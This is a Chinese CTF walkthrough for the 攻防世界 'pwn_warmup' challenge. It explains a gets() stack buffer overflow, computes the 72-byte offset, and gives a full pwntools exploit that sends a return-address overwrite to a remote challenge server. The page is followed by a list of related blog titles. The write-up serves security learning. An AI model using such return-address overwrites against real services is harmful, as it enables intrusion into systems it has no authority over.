1. checksec：没有开启任何保护
   
2. 看到了熟悉的gets()函数，通常一看到这个函数就八成有缓冲区溢出漏洞，可以看出程序为v5开辟了40H的存储空间，所以输入长度超过40H即可造成溢出，再看sprint()函数
3. 可以看到这个函数是获取flag的关键点，程序会打印出此函数的位置，即0x40060d，到这里思路就差不多明了了，我们需要控制溢出位置，把返回地址改为此函数的地址，我们当前函数的返回值位于RBP+8的位置，因此溢出点可以通过计算得出：40H+8H=48H=72
4. exp如下

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(arch = 'amd64', os = 'linux')
sh = remote('111.198.29.45',51974)
target = 0x40060d
sh.sendline('A' * 72 + p64(target))
sh.interactive()

攻防世界——pwn_warmup相关推荐

1. 【攻防世界001】Guess-the-Number

   攻防世界之前刷了几十题了,没写wp,感觉很简单没啥意思.后来参加了几次比赛,发现有点干不动,决定还是老老实实刷题好了.这是第一篇wp,这题很简单,是个jar,用jd-gui可以得到java源码. 原来 ...

2. 攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制

   ctf(pwn) canary保护机制讲解 与 破解方法介绍 程序执行流程 有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次; IDA分析 解题思路 程序存在canary保护 ...

3. 攻防世界(Pwn) forgot---栈溢出；(方法二)

   攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

4. 攻防世界(Pwn) forgot---栈溢出；(方法一)

   攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

5. 攻防世界misc新手_[攻防世界]mobile新手练习区easy-apk

   [攻防世界]mobile新手练习区easy-apk easy-apk最佳Writeup由129师386旅独立团 • devi1提供 难度系数: 7.0 题目来源: 暂无 题目描述:无 题目场景: 暂无 ...

6. 攻防世界 ——crypto

   目录 新手区部分题解: 1,easy_RSA 2,Normal_RSA 3, 幂数加密 4,easy_ECC 高手进阶区部分题题解 5, ENC 6,告诉你个秘密 7,Easy-one 8,说我作弊需 ...

7. 攻防世界———MISC 高手区题解

   目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the ...

8. 攻防世界 web（二）

   这周接着刷攻防世界的web题(￣︶￣)↗ 1.command_execution 看提示这题为命令执行漏洞(command_execution),关于命令执行漏洞,我前面有篇博客详细介绍了,大家不了解 ...

9. misc高阶 攻防世界_攻防世界 Misc 进阶题（一）

   攻防世界 Misc 进阶题(一) 关于隐写术的思路或方法 转载: https://blog.csdn.net/a_small_rabbit/article/details/79644078     隐 ...

最新文章

1. 多视图几何总结——摄像机模型
2. 三、新手Jupyter不会用，我十招教你盘她
3. CUDA编程中内存管理机制
4. lin-cms-dotnetcore功能模块的设计
5. java多维数组题目_Java题库——chapter7 多维数组
6. CCRD_TOC_2008年第4期
7. 清华学霸组团的工业 AIoT 创企再获数千万融资：玩家应推动在边缘 AI 芯片上跑算法...
8. EPSnbsp;QOS体系图的解读
9. windows常用操作
10. List数据转Map数据并进行分组排序
11. Java中将16进制字符串转换成汉字
12. 【Java基本功】很多人经常忽视的Java基础知识点
13. Using Flume要点
14. 【上电即上华为云】华为云openCPU智联模组_wifi_HF-LPX70_RISC-V_CoAP
15. Kinect外包团队（长年承接微软Kinect体感项目外包，有大型Kinect案例）
16. 车靓靓·微水上门洗车项目介绍
17. 2021年中国巴豆酸市场趋势报告、技术动态创新及2027年市场预测
18. python 等腰三角形的性质,相似三角形性质判定（）.ppt
19. ln火线零线_ln线哪个是火线零线
20. 心电监护仪数据图解_心电监护仪原理和使用步骤详解

热门文章

1. 常见滤波汇总（KF、EKF、UKF和PF）
2. html图片定位坐标原点,利用CSS定位背景图片的常用方法总结
3. LocalDateTime获取服务器当前时间----24小时与12小时
4. 【MATLAB图像处理】傅里叶变换--幅度谱、相位谱、逆变换
5. mysql 截断日期_数据截断：错误的日期时间值：“
6. SDS很好，但处理器需“减负”！
7. Java Refactor 代码重构
8. RatingBar基本使用
9. SWFObject参数,SWFObject使用方法
10. Scrapy框架快速执行cmd命令：‘scrapy crawl qsbk_spider’